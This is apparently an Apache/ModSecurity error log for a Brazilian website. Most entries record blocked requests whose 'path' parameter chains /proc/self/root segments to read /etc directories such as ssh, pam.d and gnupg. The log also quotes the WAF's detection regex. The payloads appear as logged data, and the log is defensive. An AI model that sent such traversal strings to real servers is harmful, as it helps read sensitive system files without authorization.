[Fri Mar 20 03:55:47.917820 2026] [:error] [pid 11642:tid 140411590858496] [client 74.7.241.31:47606] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvc7ninkcc-iUj5AovUwAAA5I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:49.243321 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.241.31:46260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvdRCii7xarUs8iHY2FwAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:50.983367 2026] [:error] [pid 10189:tid 140411699963648] [client 74.7.241.31:46274] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvdjJ3M9BSuKP7CAbiFAAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:55.194999 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.241.31:46276] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzve_XLqtnMIWvjpaJq7QAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:56.531124 2026] [:error] [pid 11167:tid 140411582465792] [client 74.7.241.31:46280] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvfPHIg5MgXLBnicPNoAAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:55:59.155566 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.241.31:45724] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvf-oXxyEfFpUF8f9VcgAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:56:00.451143 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.241.31:45740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvgBCii7xarUs8iHY2JAAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:56:12.325775 2026] [mime_magic:error] [pid 26799:tid 140411725141760] (70014)End of file found: [client 57.141.18.112:37774] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:56:21.471371 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.241.31:45746] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvleoXxyEfFpUF8f9ViAAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:56:22.730701 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.241.31:45510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvlvXLqtnMIWvjpaJrDAAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:56:27.103245 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:45526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvmta6ubjKNq_cu4agowAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:56:34.061110 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.241.31:59362] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvovqxLDW4GITHUkSz3AAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:56:37.889843 2026] [:error] [pid 31215:tid 140411708356352] [client 74.7.241.31:59370] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvpAF0L0L-SsrnPo46EQAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:56:39.518235 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:51002] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvp9a6ubjKNq_cu4agsAAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:56:40.883294 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.241.31:51012] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvqPXLqtnMIWvjpaJrGQAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:56:48.191861 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:37044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvsNa6ubjKNq_cu4aguwAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:56:52.096280 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.241.31:51022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzvtPXLqtnMIWvjpaJrJQAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:57:21.469104 2026] [:error] [pid 31215:tid 140411741927168] [client 74.7.241.31:52480] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzv0QF0L0L-SsrnPo46TQAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:57:25.025340 2026] [:error] [pid 21219:tid 140411699963648] [client 74.7.241.31:60724] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzv1fXLqtnMIWvjpaJrQAAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:57:29.535372 2026] [:error] [pid 7893:tid 140411733534464] [client 74.7.241.31:60732] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzv2BCii7xarUs8iHY2ggAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:57:32.174680 2026] [:error] [pid 10189:tid 140411708356352] [client 74.7.241.31:60738] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzv3DJ3M9BSuKP7CAbiZAAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:57:33.502991 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.241.31:60740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzv3fqxLDW4GITHUkS0AwAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:57:33.887998 2026] [:error] [pid 31215:tid 140411725141760] [client 74.7.243.128:54394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzv3QF0L0L-SsrnPo46XAAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
